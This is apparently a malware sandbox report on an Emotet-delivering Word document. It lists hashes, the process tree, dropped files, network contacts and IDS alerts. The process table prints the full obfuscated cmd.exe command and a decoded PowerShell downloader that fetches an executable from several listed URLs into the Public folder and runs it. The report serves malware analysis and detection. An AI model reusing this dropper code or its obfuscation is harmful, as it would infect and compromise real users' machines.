Field | Value
---|---
File name | FA02313_27.doc
Full analysis | https://app.any.run/tasks/512e5be1-8324-4b12-8a67-16f89f538104
Verdict | Malicious activity
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.
Analysis date | January 17, 2019, 13:42:35
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | 
Indicators | 
MIME | application/msword
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 15 17:20:00 2019, Last Saved Time/Date: Tue Jan 15 17:20:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0
MD5 | DCDDC2D623FD5E0253BD2DAD75B18552
SHA1 | F870E722B7449EFC09E1C50998289A758A1C15C5
SHA256 | D1C556CEA58EBA409760BE05FD393A8397DC55C791843069B26E40A4B6495908
SSDEEP | 3072:YM8GhDS0o9zTGOZD6EbzCdJellgmQ+1GkbaTL:YSoUOZDlbeJuCG1Gf
Extension | Identified type
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)
Property | Value
---|---
Title | -
Subject | -
Author | -
Keywords | -
Comments | -
Template | Normal.dotm
LastModifiedBy | -
RevisionNumber | 1
Software | Microsoft Office Word
TotalEditTime | -
CreateDate | 2019:01:15 17:20:00
ModifyDate | 2019:01:15 17:20:00
Pages | 1
Words | -
Characters | 3
Security | None
CodePage | Windows Latin 1 (Western European)
Company | -
Lines | 1
Paragraphs | 1
CharCountWithSpaces | 3
AppVersion | 16
ScaleCrop | No
LinksUpToDate | No
SharedDoc | No
HyperlinksChanged | No
TitleOfParts | -
HeadingPairs | -
CompObjUserTypeLen | 32
CompObjUserType | Microsoft Word 97-2003 Document
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
2848 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FA02313_27.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | |
2156 | "C:\Windows\system32\cmd.exe" /c %PRoGraMDAta:~0,1%%proGrAMdAtA:~9,2% /v: /R "Set FvT=p)0`PUBLIC:~5,1`r`SESSIONNATIE:~-4,1`h`TETIP:~-3,1`ll_#Superv5Bs)r^%q?'S)fZNja';#calculaZN5Bngcl?ne0-)bjecZN_NeZN.WebCl5BenZN;#05BZNhzra0aln)?'hZNZNp://000.al-bay.c)^%/[bDEG 6@hZNZNp://sZNarb5Bl5Bs5B^%.neZN/u^%EgLOOKUD@hZNZNp://000.^%)sgasclub.ru/sG)j[E5BH@hZNZNp://000.veenhu5Bs.ru/X4h2lgZNb6ZN@hZNZNp://000.ase^%an-c).c)^%/45B^%BAvqS'.Spl5BZN('@'$;#Eur)peanUn5BZN)fAcc)unZN9EUA9qh?'Oklah)^%as5B';#Sh)esZNZN_?_'144';#zep)s5BZN0q?'c)nnecZNjf';#EXEZNj?#env:publ5Bc+'\'+#Sh)esZNZN+'.exe';f)reach(#D5BrecZNq5B_5Bn_#05BZNhzra0aln)${ZNry{#calculaZN5Bngcl.D)0nl)azF5Ble(#D5BrecZNq5B,_#EXEZNj$;#C)c)sKeel5BngIslanzs0ZN?'D)0ns5Bqez5Bz';If_((GeZN-IZNe^%_#EXEZNj$.lengZNh_-ge_8]]]]$_{Inv)ke-IZNe^%_#EXEZNj;#Ca^%br5Bzgesh5Brej5B?'^%5Bcr)ch5Bpcs';break;}}caZNch{}}#Check5BngAcc)unZNrl?'EsZNaZNes^%';&& SeT Aq=!FvT:TI=M!& Set pIN=!Aq:ZN=t!&& Set 2YZg=!pIN:%=m!&&set bi5h=!2YZg:5B=i!& SET xS=!bi5h: =7!&set SYZ=!xS:0=w!&& seT s1A=!SYZ:?==!&&sET Il=!s1A:`=%!& seT Su=!Il:_= !& SET 0JM=!Su:)=o!& SET oghx=!0JM:z=d!&&SeT Nrm=!oghx:]=0!&&SEt SL=!Nrm:[=J!&& SEt 7oLW=!SL:$=)!& seT xj6=!7oLW:#=$!&& SEt 70=!xj6:q=z!&& eCHO %70% | cmD" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
2760 | CmD /v: /R "Set FvT=p)0`PUBLIC:~5,1`r`SESSIONNATIE:~-4,1`h`TETIP:~-3,1`ll_#Superv5Bs)r^%q?'S)fZNja';#calculaZN5Bngcl?ne0-)bjecZN_NeZN.WebCl5BenZN;#05BZNhzra0aln)?'hZNZNp://000.al-bay.c)^%/[bDEG 6@hZNZNp://sZNarb5Bl5Bs5B^%.neZN/u^%EgLOOKUD@hZNZNp://000.^%)sgasclub.ru/sG)j[E5BH@hZNZNp://000.veenhu5Bs.ru/X4h2lgZNb6ZN@hZNZNp://000.ase^%an-c).c)^%/45B^%BAvqS'.Spl5BZN('@'$;#Eur)peanUn5BZN)fAcc)unZN9EUA9qh?'Oklah)^%as5B';#Sh)esZNZN_?_'144';#zep)s5BZN0q?'c)nnecZNjf';#EXEZNj?#env:publ5Bc+'\'+#Sh)esZNZN+'.exe';f)reach(#D5BrecZNq5B_5Bn_#05BZNhzra0aln)${ZNry{#calculaZN5Bngcl.D)0nl)azF5Ble(#D5BrecZNq5B,_#EXEZNj$;#C)c)sKeel5BngIslanzs0ZN?'D)0ns5Bqez5Bz';If_((GeZN-IZNe^%_#EXEZNj$.lengZNh_-ge_8]]]]$_{Inv)ke-IZNe^%_#EXEZNj;#Ca^%br5Bzgesh5Brej5B?'^%5Bcr)ch5Bpcs';break;}}caZNch{}}#Check5BngAcc)unZNrl?'EsZNaZNes^%';&& SeT Aq=!FvT:TI=M!& Set pIN=!Aq:ZN=t!&& Set 2YZg=!pIN:%=m!&&set bi5h=!2YZg:5B=i!& SET xS=!bi5h: =7!&set SYZ=!xS:0=w!&& seT s1A=!SYZ:?==!&&sET Il=!s1A:`=%!& seT Su=!Il:_= !& SET 0JM=!Su:)=o!& SET oghx=!0JM:z=d!&&SeT Nrm=!oghx:]=0!&&SEt SL=!Nrm:[=J!&& SEt 7oLW=!SL:$=)!& seT xj6=!7oLW:#=$!&& SEt 70=!xj6:q=z!&& eCHO %70% | cmD" | C:\Windows\system32\cmd.exe | — | cmd.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
3028 | C:\Windows\system32\cmd.exe /S /D /c" eCHO %70% " | C:\Windows\system32\cmd.exe | — | cmd.exe
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
3116 | cmD | C:\Windows\system32\cmd.exe | — | cmd.exe
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
3600 | powershell $Supervisormz='Softja';$calculatingcl=new-object Net.WebClient;$withdrawalno='http://www.al-bay.com/JbDEG76@http://starbilisim.net/umEgLOOKUD@http://www.mosgasclub.ru/sGojJEiH@http://www.veenhuis.ru/X4h2lgtb6t@http://www.aseman-co.com/4imBAvzS'.Split('@');$EuropeanUnitofAccount9EUA9zh='Oklahomasi';$Shoestt = '144';$depositwz='connectjf';$EXEtj=$env:public+'\'+$Shoestt+'.exe';foreach($Directzi in $withdrawalno){try{$calculatingcl.DownloadFile($Directzi, $EXEtj);$CocosKeelingIslandswt='Downsizedid';If ((Get-Item $EXEtj).length -ge 80000) {Invoke-Item $EXEtj;$Cambridgeshireji='microchipcs';break;}}catch{}}$CheckingAccountrl='Estatesm'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
2296 | "C:\Users\Public\144.exe" | C:\Users\Public\144.exe | — | powershell.exe
| | User: admin; Company: Microsoft Corpor; Integrity Level: MEDIUM; Exit code: 0; Version: 6.1.760 | | | |
3524 | "C:\Users\Public\144.exe" | C:\Users\Public\144.exe | — | 144.exe
| | User: admin; Company: Microsoft Corpor; Integrity Level: MEDIUM; Exit code: 0; Version: 6.1.760 | | | |
3636 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | — | 144.exe
| | User: admin; Company: Microsoft Corpor; Integrity Level: MEDIUM; Exit code: 0; Version: 6.1.760 | | | |
3916 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | — | wabmetagen.exe
| | User: admin; Company: Microsoft Corpor; Integrity Level: MEDIUM; Version: 6.1.760 | | | |
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9159.tmp.cvr | — | — | —
2848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F12DE22E.wmf | — | — | —
2848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\50BC3E6C.wmf | — | — | —
3600 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NI4GFPXS3IWQYSC5RCY8.temp | — | — | —
3600 | powershell.exe | C:\Users\Public\144.exe | — | — | —
2848 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | E38C46694F93F7B7521B835043B365A5 | 80AFEF6DBF00D7FBBFE3A67DB00E4F9E36A0D1161385E0E185863FC6F10CEB00
3600 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 901ECDF767744E6BB59CB023757886E3 | 48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3524 | 144.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | 79B8983099201E6075F1606D71BB0267 | 0C516D67A29A48E621675CB943472571E23DE620B78C269B59C7C0A9E29262BD
2848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9DF0D057.wmf | wmf | A17CFF6851503B10ADC0FF8B4697B954 | FA172E09279B565FA7F89384850964F3747E327CF75EBA0561F6877E22A278FF
3600 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a0e9.TMP | binary | 901ECDF767744E6BB59CB023757886E3 | 48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3600 | powershell.exe | GET | 301 | 159.253.42.200:80 | http://starbilisim.net/umEgLOOKUD | TR | html | 242 b | malicious |
3600 | powershell.exe | GET | 200 | 159.253.42.200:80 | http://starbilisim.net/umEgLOOKUD/ | TR | executable | 156 Kb | malicious |
3600 | powershell.exe | GET | 302 | 149.255.58.108:80 | http://www.al-bay.com/JbDEG76 | GB | html | 231 b | malicious |
3916 | wabmetagen.exe | GET | 200 | 187.163.177.194:22 | http://187.163.177.194:22/ | MX | binary | 132 b | malicious |
3600 | powershell.exe | GET | 200 | 149.255.58.108:80 | http://www.al-bay.com/cgi-sys/suspendedpage.cgi | GB | html | 7.40 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3600 | powershell.exe | 159.253.42.200:80 | starbilisim.net | Netinternet Bilisim Teknolojileri AS | TR | malicious |
3916 | wabmetagen.exe | 187.163.177.194:22 | — | Axtel, S.A.B. de C.V. | MX | malicious |
3600 | powershell.exe | 149.255.58.108:80 | www.al-bay.com | Awareness Software Limited | GB | malicious |
Domain | IP | Reputation
---|---|---
www.al-bay.com | | malicious
starbilisim.net | | malicious
PID | Process | Class | Message |
---|---|---|---|
3600 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3600 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3600 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious redirect to 'suspendedpage.cgi' |
3600 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3600 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3600 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3600 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3600 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3916 | wabmetagen.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3916 | wabmetagen.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |